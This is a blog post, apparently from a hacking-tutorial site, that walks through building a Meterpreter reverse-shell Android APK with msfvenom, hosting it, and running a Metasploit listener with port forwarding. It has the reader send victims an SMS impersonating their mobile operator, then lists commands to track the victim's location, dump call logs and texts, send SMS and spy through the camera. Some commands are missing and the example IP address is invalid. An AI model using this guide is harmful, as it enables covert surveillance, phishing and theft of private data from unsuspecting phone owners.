Tuesday, 10 April 2018

How to hack android smartphone with an sms remotely using kali linux - SAMHACKERSWORLD

There's lots of ways to hack android smartphone using kali linux and metsploit but all those tricks are working only on local network but today i came up with idea to hack android smartphone using public ip with kali linux os and metsploit(msfvenom).Main Advantage of this hack is it work outside the network.so if person is not connected to same wifi we can also hack him using msfvenom.


1. Kali Linux OS.

2. Mobile Number.

3. Mobile Number Operator(As We Would Send Him as message as we are operator).

4. Router Supporting Port Forwarding.


How to hack android smartphone with msfvenom on kali linux?

1.Open a terminal and build the android application using below command:

msfvenom -p android/meterpreter/reverse_tcp LHOST=158.458.11.236 LPORT=8080 R > hacking.apk

158.458.11.236 => Is Your Public Ip Address where the application will respond back.

8080 => Is The Port On Which the application will work

Get Your Public Ip by Searching Whats My ip upon google

Use that ip then

Suppose i got 158.458.11.236 from google

Now dump the android application into /var/html/www directory of kali linux using below command:

cp hacking.apk /var/html/www/

2.Now open another terminal and load metasploit console by typing below command:



3.Then load the multi-handler exploit by typing : 

use exploit/multi/handler 

4.Finally it's time to generate the payload to communicate with an android smartphone:

set payload android/meterpreter/reverse_tcp

set lhost 158.458.11.236

set lport 8080

5.At last type: exploit to start the listener   

6.Now our background is set let do the main work For port Forwarding 

1st Method

Open You Router Setting

Go to Virtual Server in router and then set this options

Service Port => 80

Internal Port => 8080

Ip Address => Your Kali Machine IP Address

Protocol => All

2nd Method

Open You Router Setting

Go to Forwarding Then to DMZ

Enter Ypur Ipaddress Of Kali Machine and enable it


7.Now we will be using Online SMS Service to send User The SMS (There Are Many Search for SMS Gateway Online).

we send our public ip in sms so when user click on our public ip, malicious application will automatically get downloaded into user smartphone.

As and when victim install the application attacker get the terminal access which allow attacker to do the funny stuffs like

a.To check whether device is rooted or not type below command:


b.Check victim’s mobile exact location type:


it will show the exact location of victim mobile on Google maps

c.To download victim call logs from their mobile type:


It will download and store txt file of call logs in your root directory


d.To download sms dump type:


it will also download and store txt file of sms dump in your root directory

e.To send sms from hacked android mobile phone to someone else type:

send_sms -d “number of the person whom you want to send sms” -t “message you want send”

ex: send_sms -d 9599***847 -t hacked

f.To capture pic from victim’s mobile camera type:


g.it will provides you a list of all webcams on the victim mobile then select from the list and type:

webcam_snap 2

h.to stream live feed from victim’s mobile camera type:


it will automatically open up a browser and you will see live feed from their camera

No comments:

Post a Comment